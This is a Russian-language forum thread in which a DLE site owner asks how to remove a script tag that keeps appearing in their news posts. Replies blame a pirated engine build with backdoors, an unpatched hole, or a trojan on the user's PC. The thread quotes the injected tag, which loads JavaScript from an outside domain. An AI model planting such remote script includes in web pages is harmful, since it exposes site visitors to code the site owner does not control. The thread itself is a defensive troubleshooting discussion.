![]() |
При добавлении новости добавляется код левого скрипта. Как это убрать ?
Я добавляю новость а когда допустим захожу её редактировать в полной и короткой новости добавляется строчка <script src="http://tvoyatajna.msk.ru/injs.820cee7448076a85c6b791f82a6adcfc/" type="text/javascript"></script> ! ъ
что делать ? как от этого избавиться ? |
efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).
Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт. А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища. |
Цитата:
|
Цитата:
Угадать на 100% откуда это взялось - нельзя, но дыра где то есть - это однозначно. У меня форум 2 раза турки взламывали, я репу чесал, думал как, перерыл немеренно инфы. А оказалось ломали через DLE, который лежал в соседней папке с форумом. |
Не стоит исключать возможность присутствия на компе трояна, который добавляет во все POST запросы свои ссылочки ))
Винда форева! Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты )) |
Цитата:
-------------------------------------------------------------------- кстати. До сих пор есть остаточек от галеры, "Цезарь" называется. Никак не удалить из админки. Вроде и не мешает, а вот, что-то не совсем спокойно. |
|
100-пудово троян, у меня тоже такое было. Перелопатил ручками весь код. На хосте всё снёс и заного залил чистый код.
ЗЫ: правда не в дле. В Дле много файлов задействованно для добавлеия новости. Ручками тяжело будет... |
Текущее время: 09:32. Часовой пояс GMT +3. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2025, vBulletin Solutions, Inc. Перевод: zCarot